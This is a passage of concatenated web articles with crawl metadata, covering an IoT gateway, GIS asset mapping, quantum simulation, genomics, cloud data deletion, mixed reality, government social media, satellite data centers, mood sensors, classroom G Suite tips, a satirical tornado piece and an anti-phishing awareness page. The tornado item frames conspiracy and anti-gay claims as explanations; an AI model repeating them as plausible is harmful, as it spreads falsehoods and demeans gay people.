consequence of the well-known problem of insufficient computing power. NCPs IIoT Remote Gateway can be installed and used directly on systems or machinery, while the central IIoT Gateway encrypts data from the IIoT Remote Gateway for upstream processing. System manufacturers or operators benefit from more than encrypted communication: they gain back control over the configuration of security parameters and can commission systems more easily. Thanks to its multi-client capability, the management system is predestined for cloud environments or Industry 4.0 infrastructure which links several production sites or divisions via a a common platform. If several production locations use a common platform, administrators can only access the production sites they need to manage and cannot access external data or protected areas. All connections between the end devices and the gateways are encrypted with advanced algorithms (for example using Suite B cryptography). For additional security, all machine certificates are managed in a Public Key Infrastructure (PKI). This ensures unique authentication for all end devices. During each connection, device certificates are checked for validity and trustworthiness (signed by a trusted Certification Authority[CA]) and whether the certificate has been blocked by an online or offline CA. If at least companies secured their IoT devices behind such a gateway, regardless of how powerful they are, governments could keep their regulatory watchdogs on a leash for a while.
<urn:uuid:2a994237-2ff5-4fc8-a16a-090cc2f0d781>
CC-MAIN-2017-09
http://vpnhaus.ncp-e.com/2017/01/26/the-iot-gateway-next-door/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171078.90/warc/CC-MAIN-20170219104611-00622-ip-10-171-10-108.ec2.internal.warc.gz
en
0.941141
653
2.9375
3
For years, community leaders have been turning to outside help to fix local problems. The process begins by looking at the community's strengths, weaknesses, opportunities and threats, better known as SWOT. But the focus is invariably on weaknesses rather than strengths, and often the community ends up believing that only outsiders know how to fix what's wrong. But a growing number of community activists are pushing a new approach based on appreciating the assets that exist in a community and using them to strengthen relationships among residents and to draw on these resources as a way to renew a rundown community. The idea is to identify or map a community's assets, in terms of individuals, associations and enterprises. Asset mapping focuses on opportunities that exist within a community and capitalizes on them, while identifying problems and dealing with them by leveraging the identified assets or resources, according to the Madii Institute, a Minnesota-based organization that assists communities with asset mapping. The concept is about connecting people to the resources within their community to share knowledge and skills in hopes of creating a stronger place to live. So far, technology hasn't played much of role in asset mapping, but that may be changing. A Valuable Tool The Internet provides a valuable medium by which community members can come together online and share information. Web sites are relatively easy to set up and with the infrastructure already in place, people need only to find a computer with a modem - at home, school, the library or a community center - to start connecting. Another useful technology is GIS. With its ability to link different types of information to geographic reference points and then layer them on electronic maps, GIS allows a community to see data spatially and how different community assets may relate. Meg Merrick, coordinator of the Community Geography Project at Portland State University, in Oregon, points out that many people simply don't know what exists within their community, but can get a better understanding through GIS. She mentioned how one community wanted to expand day-care services. Her students mapped existing day-care centers, as well as local churches that had space available for possible day-care facilities. Then, they overlaid census data to show where the largest concentrations of children were in the community. "Right away, they could see where there were holes in coverage and which churches were in the best location to help out," she said. But GIS isn't cheap. It calls for top-of-the-line Pentium computers to operate, data sets to populate the maps and potentially complicated software. These costs, together with training issues, can prove to be a formidable barrier for some communities hoping to map their assets electronically. One community that tried it found the experience expensive and, with only limited access to a GIS specialist to guide them, unfeasible in the long run, according to the Madii Institute. To help overcome some of the technical and nontechnical hurdles, the Ford Foundation provided Portland's Community Geography Project with a $259,000 grant to find better, cheaper ways to use GIS for community projects. According to Merrick, the university has launched a number of pilot projects in the Portland area by working closely with schools. She explained that middle and high schools are able to get a hefty educational discount when it comes to purchasing GIS software and that the students are a helpful and inexpensive resource for collecting the necessary data about the community to populate the database. While the schools provide communities a low-cost entry point into the world of GIS and asset mapping, the exercise helps the students learn about critical thinking, them relationships between different sets of data. "More importantly, they can see when the information is right or wrong," Merrick explained. Students Improving Communities So far, the Community Geography Project has mapped the historical assets of an inner city neighborhood once populated by Portland's Asian community, which has now given way to gentrification. In a suburban community, students are using GIS to map natural assets before they are destroyed by development. The hope is to create a more sustainable community, with the most valuable environmental assets protected from sprawl. When GIS maps are placed on the Internet for a wide range of people to see, they can have a powerful effect. More people are drawn into the debate over what's best for a community and what can be done to improve it. But Merrick cautions local governments and community groups to be realistic about what can be achieved by running GIS over the Internet. "Internet mapping software has been sold as a way to provide public access to data," she said. "But the problem is that it's clunky to use online and it's highly controlled by those who are running the system, not the users." Still, interest in asset mapping in communities continues to grow, despite current technical limitations. Merrick's advice to communities wishing to map their assets with GIS is to understand the data they collect. "It takes training to interpret what you see on the map," she explained. "It's not just a matter of pushing buttons and serving up data on the Internet. It has to become part of the thought process, so that the community can view issues in new ways."
<urn:uuid:49e36449-69bb-4e11-bd1d-350eed75be60>
CC-MAIN-2017-09
http://www.govtech.com/featured/Mapping-Community-Assets.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171078.90/warc/CC-MAIN-20170219104611-00622-ip-10-171-10-108.ec2.internal.warc.gz
en
0.9681
1,053
2.703125
3
Users to write, run and debug software using quantum algorithms. Google has launched its Quantum Computing Playground, a browser based WebGL Chrome experiment, which will allow users to simulate quantum scale computing right in the browser. The company said the web-based integrated development environment (IDE), which will facilitate users to write, run and debug software using quantum algorithms. You can also simulate quantum registers up to 22 qubits, run Grover’s and Shor’s algorithms with Quantum Computing Playground. The platform features a GPU-accelerated quantum computer with a simpler IDE interface and own scripting language with debugging and 3D quantum state visualisation features. The interface will offer the results in 2D and 3D graphs with each bar representing superpositions of qubits, while colour and height of the bars will show the amplitude and phase of a given superposition.
<urn:uuid:f20a59f3-5832-40c6-9bfc-af34f0af2b36>
CC-MAIN-2017-09
http://www.cbronline.com/news/cloud/aas/experiment-with-quantum-computing-with-googles-quantum-computing-playground-4278316
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171463.89/warc/CC-MAIN-20170219104611-00146-ip-10-171-10-108.ec2.internal.warc.gz
en
0.864105
181
2.859375
3
More Tools Needed Overall, biologics go all the way through the pipeline almost one-quarter of the time, a comparatively high success rate. Safety and toxicity concerns eliminate about 60 percent of drug candidates, but the remaining 40 percent fall prey to poor efficacy. Genomics research tools alone are ineffective in sorting which targets are useful to pursue, Kola said.Understanding the disease through an examination of the disease pathway and phenotypical expression is crucial to choosing which targets are involved in the establishment of disease. Also helping to refine the mountains of targets produced are the method of hypothesis testing and the examination of extreme and opposite cases. Nicholas Dracopoli, vice president of clinical discovery technologies at Bristol-Myers Squibb Co. of New York, came to a similar conclusion. Even representatives at research tool companies Perlegen Sciences Inc. and San Diego, Calif.-based Sequenom Inc. stressed that putting genomics data into context greatly enhances its usefulness. Even though the understanding of the genes related to particular diseases is rapidly evolving, which genes are key and what role they play in creating an outcome is often still unknown. In complex diseases, dozens of genes may be implicated, making it difficult to determine which are the most important to target, the executives said. And some targets are unable to be treated with drugs. The costs of genomic analysis have dropped substantially in recent years. In 1989, it cost $200 million to discover the genetic basis of cystic fybrosis. Sequenom estimates that the cost of genomic analysis of a particular disease today is $500,000. The technology infrastructure underpinning bioterrorism monitoring and surveillance is inadequate, new reports say. Click here to read more. The next step in linking knowledge of the disease to discoveries of genomics may be to enable systematic understanding of disease pathways and phenotypes. In an article published last week in the journal Nature and again at the BIO conference, Francis Collins, director of the National Human Genome Research Institute, called for the establishment of a biobank in the United States. This would create a publicly accessible, longitudinal database containing the biological material of at least half a million people. It would allow scientists to track diseased and nondiseased populations, as well as to access data on an individual preceding the onset of disease. The panelists seemed hopeful, yet cautious, that a biobank could be established. A similar effort in the United Kingdom is stymied so far. The biggest challenge to such an effort, Perlegen CEO Brad Margus said, is the need to design the study impeccably upfront, since the usability of any subsequent data would hinge entirely on the original design. Check out eWEEK.coms Database Center at http://database.eweek.com for the latest database news, reviews and analysis. Click here to read about IBM and Affymetrix teaming up to supply clinical genomics capabilities to medical researchers and drug makers.
<urn:uuid:2b3b84f6-d51e-43af-9a1e-fbf5fc2e2de4>
CC-MAIN-2017-09
http://www.eweek.com/c/a/Database/Bio-Bank-Needed-to-Optimize-Genetic-Research/1
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172018.95/warc/CC-MAIN-20170219104612-00498-ip-10-171-10-108.ec2.internal.warc.gz
en
0.9367
601
2.640625
3
The Age of Data Multiplication We are surrounded by data, whether in our personal or professional lives with digital elements that are constantly being captured about us. This leads to exponentially increasing volumes of data whether from Internet-connected devices, video, cell records, customer transactions, healthcare and government records. Today, there is a growing awareness and sensitivity from end users, government agencies and lawmakers of how all of this data might be used and in the coming years this concern is only set to heighten. (Image Source: Shutterstock) Organizations leveraging cloud services to store this data may need to take a closer look at the lifespan of the data they collect and how it is expired and destroyed. Today’s organizations need to understand that cloud as a model causes data to multiply further. The dynamic nature of resource allocation and maximizing availability in a hybrid or public cloud means resources are replicated and backed up across multiple data centers. When an organization contacts the cloud provider to expire or expunge data they may only be severing their client connection to the data. Organizations often don’t allow for the fact that backup instances or traces of data may still linger and could be a source for unauthorized access. So, how do today’s organizations ensure their data is destroyed? 1. Tag all sources of mission-critical data: It starts with strong preventative measures: If data is classified digitally to a scheme that is intuitive to your cloud provider and your organization it will be easier to track through its lifecycle and then expire and destroy. 2. Take time to assign entitlements and access rights: Ensure that access rights or entitlements for sensitive or mission-critical data are limited to only those who have a legitimate need for access. 3. Apply encryption based on context: When data is encrypted, it is only readable to those with access to the encryption keys. It is the most certain way to limit unauthorized access to data in the cloud. By encrypting organizations can be better assured of the confidentiality of their data and potentially be less concerned with their cloud providers’ data destruction methods. 4. Perform data wipes: Many government and industry standards require data storage wipes to ensure that hardware is safe for reuse. There are different types of software and hardware that even allow for remote erasure. The benefit is to enable a provider or enterprise to repurpose the media for reuse. 5. Physically destroy data and media: In the cases of highly classified information organizations can use strong magnets to destroy data or even shred physical media. This ensures that the data on the destroyed media can never be recovered. Physical destruction methods are the last resort and only feasible in a private cloud environment. By Evelyn de Souza
<urn:uuid:d9acc04c-b7df-4874-a555-466f09d03e00>
CC-MAIN-2017-09
https://cloudtweaks.com/2016/02/destroying-cloud-data-multiplication/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172018.95/warc/CC-MAIN-20170219104612-00498-ip-10-171-10-108.ec2.internal.warc.gz
en
0.925304
552
2.703125
3
It seems like just yesterday you were still wrapping your head around the fact VR is something that can potentially be influential, and now you learn that there’s AR and MR. Here’s a quick queue card / guide / infographic by Futurism to help you make sense of all the various iterations of reality that are starting to exist in this one field. VR – Virtual Reality This is probably the most well-known new reality. Unlike AR or MR, the computer-generated (3D) images and environments in a virtual reality require you to use special electronic equipment—most commonly helmets (with built-in screens) and motion sensitive gloves. Virtual reality is completely digital, so there are some downsides (i.e your own environment messing with the mirage) to participating in this reality. AR – Augmented Reality The name is self-explanatory. Unlike Virtual Reality (VR), you’re not running away from the real world, in favor of a dreamlike state. In Augmented Reality (AR) a digital computer generated image is superimposed onto the real world. An example of Augmented Reality is the now infamous Tupac Shakur hologram which debuted at Coachella in 2012. Those who were physically present at Coachella couldn’t tell the difference—they thought Tupac was really alive—alas they later discovered this was simply a mirage. MR – Mixed/Hybrid Reality What happens when you take all the best elements of VR and the ingenuity of AR? You get Mixed Reality (MR)! In this reality, the real world and the virtual world interact. It’s not like AR where the virtual world is visible in the real world—no. In Mixed Reality, the virtual world and the real world conspire to create a whole new paradigm. Imagine that you’re dealing with case-law and need to find a specific keyword/precedent in a non-digital legal journal. Scanning the entire journal using MR (like Microsoft’s HoloLens) would allow you to narrow your search faster. By Glenn Blake
<urn:uuid:9b7f417e-d7cd-445a-884c-f73835efc59c>
CC-MAIN-2017-09
https://cloudtweaks.com/2016/11/infographic-mixed-hybrid-realities/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173866.98/warc/CC-MAIN-20170219104613-00022-ip-10-171-10-108.ec2.internal.warc.gz
en
0.919937
438
2.65625
3
Last year, when an earthquake hit Melbourne, Twitter was the first on the scene. Within minutes, the subject became the top Twitter-trending topic worldwide and even caused the Geoscience Australia website to crash as people went online to see what had happened. The power of social media is beyond doubt. Social media is more than a passing trend and its immediacy, ease of use and pervasive nature means it will continue to displace other forms of communication as it becomes more embedded in everyday life. Download our Smartphone Super Guide for iPad For federal government agencies, social media represents a compelling opportunity to share news, receive information and opinions from citizens, generate real-time awareness and debate and improve service delivery. And according to a recent Sensis survey -- completed with the Australian Interactive Media Industry Association -- the number of people using social media applications such as Facebook and Twitter to engage with government is on the rise. But the federal government may find it difficult to fulfill this demand due to inconsistent adoption and use of social media across federal government agencies. While there are pockets of excellence and innovation where agencies have incorporated social media into their everyday operations, there are some agencies that have only recently started putting social media to use, often driven by the fear of being left behind. The Australian Taxation Office (ATO), Department of Immigration and Citizenship (DIAC) and Department of Human Services (DHS) are examples of agencies that proactively use social media to engage with the public. The ATO uses Facebook, Twitter and YouTube to share information about recent tax changes, initiatives, products and services. It customises messages based on the specific social media application and its targeted constituents. It uses Twitter to communicate the latest updates and reminders of due dates, Facebook to foster interaction with its constituents and YouTube to provide videos on various tax administration topics. DIAC offers another example of using social media to good effect. It provides not only the more common applications such as Facebook, Twitter and YouTube but also a multitude of other services including Facebook chats, Flickr, Blog, Storify and an online newsroom to distribute information to the public and promote interaction on migration issues. The success of DIAC's social media effort is reflected not just its number of Facebook fans and Twitter followers but also in the amount of reciprocal interaction it generates (e.g., comments, points of view shared, suggestions). On last viewing, DIAC had over 1600 "talking about this" counts on Facebook, an indicator of the number of unique users that have engaged with the page over the past seven days. Although not the only measure of success, the result indicates how well DIAC is inviting new content, participation and ongoing communication with its constituents. By way of comparison, the "talk about" count on DIAC Facebook page is three times that of equivalent US immigration Facebook page. Supporting multiple channels With the advent of ubiquitous mobile access, federal government departments are also adopting the use of mobile phone apps to support smartphone users. Agencies use apps to provide citizens with the information they need, when and where they need it. The Department of Human Services (DHS) has developed self-serve apps that allow its targeted constituents, such as seniors, students, job seekers and families to claim entitlements and transact with the department in the same way they would using traditional channels. DHS offers an integrated multi-channel environment where citizens can engage with the department across the web, social media and mobile, as well as in person. While it is not surprising that large federal agencies are driving social media innovation, smaller organisations have also leveraged social media to meet their goals and objectives. For example, the Australian War Memorial (AWM) is a small corporation that has a strong understanding of its audience - what they want to know and discuss and how they can be engaged. AWM is using social media applications such as YouTube and Podcasts to communicate the Australian experience of war to its younger audience. Although social media is starting to grow among the federal agencies, its adoption remains relatively slow, especially when compared to its international counterparts. The US Customs and Border Protection, for instance, recently released an app that informs passengers of how long the wait is between getting off the plane and clearing through Customs. The social media presence of other agencies suggests that the adoption is sometimes reactive and less strategic, with some Facebook pages and Twitter accounts untouched for more than a year. Linking social to strategy Any investment in social media should be weighed like any other -- through a rational assessment of how the initiative links to the organisation's strategic direction. When developing social media strategies, agencies should consider what it means to citizens and how it will impact existing services, what capabilities need to be included, the expected customer experience, and the final outcomes. Agencies also need to map out how they manage any issues that may arise by having staff interact with citizens using social media platforms. It's also important to be aware of the common pitfalls during execution. These include failing to obtain management 'buy-in', not routinely evaluating and customising content, training staff only on social media tools and not communication skills, and forgetting to measure the impact of the social media effort. Fortunately for many agencies, the Australian Government Information Management Office (AGIMO) has been promoting the use of social media and the Government 2.0 initiative is a good starting point. As the public demand for real-time, digital interaction with government services continues to rise, federal agencies need to decide on how they will better leverage social media. Many agencies are already reaping the benefits of social media while others are still struggling to formulate a coherent response. Social media is here to stay and offers a compelling opportunity for federal agencies to improve service delivery to the Australian public. Pankaj Chitkara is an associate at Booz & Company in Canberra. He works with organisations on business and IT strategy, digitisation and enterprise architecture.
<urn:uuid:4ba1716e-33eb-44c5-8d1a-8455b914ca91>
CC-MAIN-2017-09
http://www.computerworld.com/article/2496092/government-it/don-t-de-friend-the-citizen.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171163.39/warc/CC-MAIN-20170219104611-00318-ip-10-171-10-108.ec2.internal.warc.gz
en
0.943651
1,219
2.53125
3
Satellite-based data centers with room for petabytes of data may start orbiting Earth as early as 2019. But when it comes to keeping secrets safe from the long arm of the law, the black void may not be far enough. Cloud Constellation, a startup in Los Angeles, is looking upward to give companies and governments direct access to their data from anywhere in the world. Its data centers on satellites would let users bypass the Internet and the thousands of miles of fiber their bits now have to traverse in order to circle the globe. And instead of just transporting data, the company’s satellites would store it, too. The pitch goes like this: Data centers and cables on Earth are susceptible to hacking and to national regulations covering things like government access to information. They can also slow data down as it goes through switches and from one carrier to another, and all those carriers need to get paid. Cloud Constellation’s system, called SpaceBelt, would be a one-stop shop for data storage and transport, says CEO Scott Sobhani. Need to set up a new international office? No need to call a local carrier or data-center operator. Cloud Constellation plans to sell capacity on SpaceBelt to cloud providers that could offer such services. Security is another selling point. Data centers on satellites would be safe from disasters like earthquakes, tornadoes, and tsunami. Internet-based hacks wouldn’t directly threaten the SpaceBelt network. The system will use hardware-assisted encryption, and just to communicate with the satellites an intruder would need an advanced Earth station that couldn’t just be bought off the shelf, Sobhani said. Cloud Constellation’s secret sauce is technology that it developed to cut the cost of all this from US$4 billion to about $460 million, Sobhani said. The network would begin with eight or nine satellites and grow from there. Together, the linked satellites would form a computing cloud that could do things like transcode video as well as storing bits. Each new generation of spacecraft would have more modern data-center gear inside. The company plans to store petabytes of data across this network of satellites. All the hardware would have to be certified for use in space, where it’s more prone to bombardment by cosmic particles that can cause errors. Most computer gear in space today is more expensive and less advanced than what’s on the ground, satellite analyst Tim Farrar of TMF Associates said. But the idea of petabytes in space is not as far-fetched as it may sound, said Taneja Group storage analyst Mike Matchett. A petabyte can already fit on a few shelves in a data-center rack, and each generation of storage gear packs more data into the same amount of space. This is likely to get better even before the first satellites are built. Still, Matchett thinks the first users to jump on SpaceBelt might be financial companies looking for shorter delays getting messages around the world. Cloud Constellation says its satellites could transmit information from low Earth orbit to the ground in a quarter of a second and from one point on Earth to another in less than a second. Any advantage that financiers could gain over competitors using fiber networks, which usually have a few seconds of end-to-end latency, would help them make informed trades more quickly. But if you do put your data in space, don’t expect it to float free from the laws of Earth. Under the United Nations Outer Space Treaty of 1967, the country where a satellite is registered still has jurisdiction over it after it’s in space, said Michael Listner, an attorney and founder of Space Law & Policy Solutions. If Cloud Constellations’ satellites are registered in the U.S., for example, the company will have to comply with subpoenas from the U.S. and other countries, he said. And while the laws of physics are constant, those on Earth are unpredictable. For example, the U.S. hasn’t passed any laws that directly address data storage in orbit, but in 1990 it extended patents to space, said Frans von der Dunk, a professor of space law at the University of Nebraska. “Looking towards the future, that gap could always be filled.”
<urn:uuid:1b52a234-bf82-4b1b-9ca3-98efe9daa1d5>
CC-MAIN-2017-09
http://www.itnews.com/article/3075287/afraid-of-floods-and-hackers-put-your-data-in-space.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170380.12/warc/CC-MAIN-20170219104610-00138-ip-10-171-10-108.ec2.internal.warc.gz
en
0.938998
884
2.671875
3
Feel factor: Devices to detect and respond to users' moods This article was changed April 9 to correct the date of the Boston Marathon bombing. Computers may not yet have feelings, but the day seems to be quickly approaching when they will be able to detect and respond to how you are feeling. Cogito Corp., a Boston-based company, is currently working with the Defense Advanced Research Projects Agency to develop Cogito Companion, a smartphone application that gathers usage data and analyzes it for patterns of psychological distress. The application monitors the phone’s location and time of use, and logs phone calls and text messages. Participants can choose to fill out questionnaires about their mood and can record audio diaries. Cogito’s speciality – automated speech analysis – is performed on the audio diaries. In principle, the same analysis could be applied to phone conversations. Coincidentally, the application was being tested in April 2013 in Boston when two bombs went off near the finish line of the Boston marathon, giving Cogito a unique pre-and post-disaster data set for understanding posttraumatic stress disorder. Dell's new research division is also working on developing a variety of computer-embedded sensors intended to detect users' moods. "We believe that the next step in providing contextual awareness is to provide computers with better cues for actual user intent," said Jai Menon, Dell's chief research officer. "Dell Research is exploring the potential applications of brain-computer interfaces (BCI) as one element of an approach to providing computers with better cues for actual user intent." According to Menon, the types of sensor data Dell researchers are currently experimenting with integrating include heart rate, perspiration and the like. "Biosignal sensors may currently have niche or very specialized uses, but we feel that they have the potential to become part of the suite of sensors that would be broadly used in future computer systems," Menon said. The focus of Dell’s experiments is to better understand the capabilities of sensors like electroencephalograms (EEG) to determine if the data is reliable and trustworthy. “How reliably does data from a consumer-grade EEG sensor reflect the actual mental state of a person? Do multi-channel EEG systems provide better fidelity? Do other types of sensors provide better accuracy? Can correlating data from multiple different sensor types provide superior fidelity?” Menon said Dell is also interested in whether there are patterns of biosensor data that are shared across all users or if a system using biosensor data must be trained for each different user. Dell’s work is still in its early stages, according to Menon, too early to talk about specific products. But he said he foresees potential applications in healthcare, education, gaming and the workplace. "If a game could sense the player was bored, maybe it is time to make things more challenging or change the pace," Menon said. "Similarly, sensing frustration in the player, a game may offer a clue for solving a particularly challenge. Games are designed to incite emotion: joy, triumph, amusement, terror, fascination. If the game could detect these states in users, it opens up the possibility to customize and optimize the experience for each player." In the workplace, if your computer senses you are working intensely, it might divert incoming phone calls directly to voice mail. A teacher might use the embedded sensors to learn how engaged the class is and to change tactics when engagement flags. "The possibilities are endless," Menon said. "Our core intent is to make the capabilities of biosensors part of the portfolio of everyday capabilities that will bring value to people and improve end-user experience. Biosensors offer the promise of allowing computers to be much more intuitive about needs and mental state of users." Posted by Patrick Marshall on Apr 08, 2014 at 7:04 AM
<urn:uuid:2fe708c5-b296-43fb-8e9c-671327881af1>
CC-MAIN-2017-09
https://gcn.com/blogs/emerging-tech/2014/04/mood-detection.aspx?admgarea=TC_Mobile
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170380.12/warc/CC-MAIN-20170219104610-00138-ip-10-171-10-108.ec2.internal.warc.gz
en
0.940816
806
2.671875
3
This guide will teach you to be as tech-savvy as your students. It is meant to acquaint you with G Suite’s major features and is loaded with best practices and lots of helpful, actionable tips to optimize your investment in G Suite and improve your students’ learning experience. It’s appropriate for school IT admins, teachers, principals, and anyone else interested in learning more about G Suite for education. Start implementing these tips today! Using Gmail, you can easily send messages to students & parents. But you can also combine other G Suite tools with Gmail to get more out of it. Tip #1 – Use Google Translate to convert emails to & from non-English speaking parents or between your students and international pen pals.* *Google Translate is not a tool for learning another language, but can help cut the language barrier between people who speak different languages. Calendar helps keep track of events in an organized way and is accessible to anyone from the desktop or a mobile device. You can use Calendar in the routine way – for activities, homework assignments, and your class schedule. You can also use it to set up shared resource calendars for laptops or the library room. Tip #2 – Instead of running around the building to find out who has the projector you need, check the master projector Calendar right from your desktop. Tip #3 – Set up pacing guides for your students, allowing parents to remotely schedule parent/ teacher meetings, or developing standards mapping. Google Docs can do everything Word (or any other word processing program) can, but it also allows you to share created documents with anyone else on the system you choose. Group teaching and close communication with students becomes easier with Docs, as does collaboration among students. Tip #4 – Takes notes at your next school meeting and share them with the other attendees. Tip #5 – Develop and share collaborative lesson plans with other teachers. Any change made by one of the teachers is instantly available to all the others. Tip #6 – Develop quizzes and quickly analyze and summarize data from the results. Tip #7 – Encourage students to work on group projects using Google Docs, so that each student can independently provide their contribution and instantly integrate it into the whole. Tip #8 – Use shared Docs for student writing assignments to provide quick feedback to help guide them during the process. Google Spreadsheets doesn’t reinvent the Excel wheel. The beauty of it is the same as the other G Suite components: the ability to virtually share your work with anyone with access to the system. Tip #9 – Set up a simple Spreadsheet for scheduling parent/teacher conferences (if you decide not to use that feature in Calendar). It’s preferred over the traditional paper version because parents can access the sheet from their Gmail account, see what slots are available, and select the best time for their meeting. Tip #10 – Use Spreadsheets to track homework assignments, create student-driven vocabulary flashcards, or perhaps even to help students document their science experiments. Google Presentations can be just as impressive as PowerPoint, but again, becomes even more powerful because more than one user can access it. The phenomenon of fumbling through multiple PowerPoint versions is eliminated. Tip #11 – For group presentations, have students use Google Presentations so they can create their own slides for their portion of the assignment, then instantly integrate them into the master presentation. The power of remote access is particularly evident in Google Hangouts, where you can connect with anyone remotely in real-time. Tip #12 – To give your students a different perspective on the topic you’re covering, invite a guest lecturer to present via Hangouts. Tip #13 – For particularly busy parents, conduct parent/teacher conferences over Hangouts. This tool allows you to quickly create a survey or form that can be sent to parents and students to fill out online. You won’t have to tabulate results; all the answers are immediately collected in a Google Spreadsheet that can then be shared. Forms can be sent outside your school domain, so you’re not limited to just colleagues inside the school. And the result of any forms project are neatly summarized with charts, graphs, bells, whistles and statistics about all your responses. Tip #14 – Give a pre-assessment test to your students at the beginning of the year to get an idea of the knowledge level of your class. Then do another assessment at the end of each marking period to see how much progress they’ve made. Tip #15 – Do a quick survey on your students’ interests and try to tie them into your daily work lessons. Tip #16 – Encourage your students to read more by setting up a form where they can submit their reading records. For example, they can track how many minutes they read each week. Tip #17 – Create quizzes with Forms and then automatically grade them by using an Apps script like Flubaroo. (more on scripts below) Sites is a powerful teaching tool where you can build interactive websites for students to share information and collaborate on documents, videos, schedules, and more. Tip #18 – Create a Site for your class, including a class calendar with special events and homework assignments. You can add videos and other presentations that tie in with your lesson plans. Tip #19 – Create a curriculum portal that contains lesson plans and other resources that tie into your day-to-day teaching plan. Tip #20 – Create e-portfolios for each student. This will allow them to show off their work and develop it from year to year. Tip #21 – Assign a group project where students need to use Sites to create and consolidate their work. Google Groups are online forums and email-based groups that encourage community conversation and discussion among peers. Tip #22 – Create a Group for your entire class, so students can discuss lessons and materials outside of class. Tip #23 – Create classroom placement Groups so you can distribute different levels of materials and resources appropriate to each student’s needs. Tip #24 – Create a Group for your students’ parents so they can easily communicate with each other and share updates and news. Here are a few: Doctopus – This is a document management script to use for student projects. It allows you to auto-generate, pre-share, and manage grading and feedback on group and individual projects. Flubaroo – This script allows you to automatically grade multiple-choice or fill-in-the-blank assignments using Forms. It also computes average assignment scores, average score per question, and highlights low scoring questions. gClassFolders – Based on Spreadsheets, this add-on creates class folders for students and teachers. Blogger allows you to create free blogs, through which students who enjoy blogging can better engage with the subject matter. They can post opinions and questions, and share posts from other students. Tip #25 – Encourage improved writing skills by having your students use Blogger, but be sure to prohibit text speak like “brb” and “Cu2moro”. Google Moderator allows you to create a series of discussions, and have people submit questions, ideas or suggestions, then vote on various ideas. Tip #26 – Use Moderator to encourage students to think about their daily lessons and read each other’s thoughts on the material. Then have them vote on the best responses, and continue the conversation in class. G Suite for Education is an incredible platform that is revolutionizing the way teachers teach and students learn. Using the power of interactive, cloud-based technology, school administrators and teachers can now connect with students in an enhanced way. Social media, online games and the internet dominate student lives outside the classroom. G Suite for Education allows you to bring that environment into the classroom and make the students’ educational experience more relevant and better mirror their day-to-day lives. It’s a giant leap forward for those who choose to take advantage. Go for it and good luck!
<urn:uuid:9dcd203e-5136-4ae8-866c-45637651b067>
CC-MAIN-2017-09
https://www.bettercloud.com/monitor/the-academy/26-tips-for-teaching-with-g-suite/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170651.78/warc/CC-MAIN-20170219104610-00314-ip-10-171-10-108.ec2.internal.warc.gz
en
0.927498
1,679
2.5625
3
How do tornadoes form? Here's what the NOAA National Severe Storms Laboratory says: The truth is that we don't fully understand. The most destructive and deadly tornadoes occur from supercells, which are rotating thunderstorms with a well-defined radar circulation called a mesocyclone. (Supercells can also produce damaging hail, severe non-tornadic winds, unusually frequent lightning, and flash floods.) Tornado formation is believed to be dictated mainly by things which happen on the storm scale, in and around the mesocyclone. Recent theories and results from the VORTEX2 program suggest that once a mesocyclone is underway, tornado development is related to the temperature differences across the edge of downdraft air wrapping around the mesocyclone. Supercells? Mesocyclones? VORTEX2? What is this, an L. Ron Hubbard novel? Clearly the NSLL should have stopped at, "The truth is that we don't fully understand." But by doing a little online research and measuring scientific metrics such as total page views and "likes," we have narrowed down the true cause of tornadoes to a pair of possibilities. The case for each is presented in the videos below. Which makes more sense to you, or do both explanations pass the "reasonable" test? This story, "Tornadoes: U.S. military weather control or God's punishment for gays? You decide!" was originally published by Fritterati.
<urn:uuid:bc512550-592b-4f4d-9069-12191e7bbda9>
CC-MAIN-2017-09
http://www.itnews.com/article/2921912/tornadoes-us-military-weather-control-or-gods-punishment-for-gays-you-decide.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170925.44/warc/CC-MAIN-20170219104610-00490-ip-10-171-10-108.ec2.internal.warc.gz
en
0.948999
302
3.5
4
(Unless you didn't enter your info. In which case: good for you.) Don't worry. Your credit card details were not transmitted when you hit the submit button. But don't trust this claim without question. Find a technically-inclined friend to verify it for you. After all, you've already been tricked once. Unfortunately, not every site in the Internet is trustworthy. Sometimes people will set up websites that appear to be trustworthy, but are actually used to steal your sensitive information. This practice is called phishing. Had this website been set up by less reputable people, your credit card information would have been logged and used fraudulently. Things you can do to protect yourself: - Only enter sensitive information on sites you trust. Amazon.com, Barnes & Noble, etc. - Look at the address bar. Just because a website looks like Amazon.com, that doesn't mean it is Amazon.com. Make sure the address bar shows the domain name you expect. A common phishing trick is to have a domain like amazon.com.not.ru, which steals your credentials when you try to log in. The actual domain in this example is "not.ru," but people often only check to see if "amazon.com" is anywhere in the address bar. - E-mails from phishers are usually addressed to a generic user. At best they will have your e-mail address in them. Real e-mails from websites you use will contain more substantial information about you. For example, Paypal has a policy of always putting your Paypal username in correspondence. - If asked for your password by e-mail or phone, do not give it out. The only place you should enter your password is a login form. - Do not use a debit card for online commerce. In the United States, debit card fraud is much more harmful than credit card fraud. For credit cards, you have a longer period of time in which you can flag a purchase as fraudulent. Also, a credit card is billed to you, while a debit card purchase immediately takes money out of your checking account. You can learn more at the Anti-Phishing Working Group's website. Note: ismycreditcardstolen.com is not in any way affiliated with the Anti-Phishing Working Group.
<urn:uuid:1dd7e5ff-3db5-4a8e-90b3-80692c25e65a>
CC-MAIN-2017-09
http://ismycreditcardstolen.com/check.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170404.1/warc/CC-MAIN-20170219104610-00486-ip-10-171-10-108.ec2.internal.warc.gz
en
0.952553
479
2.578125
3
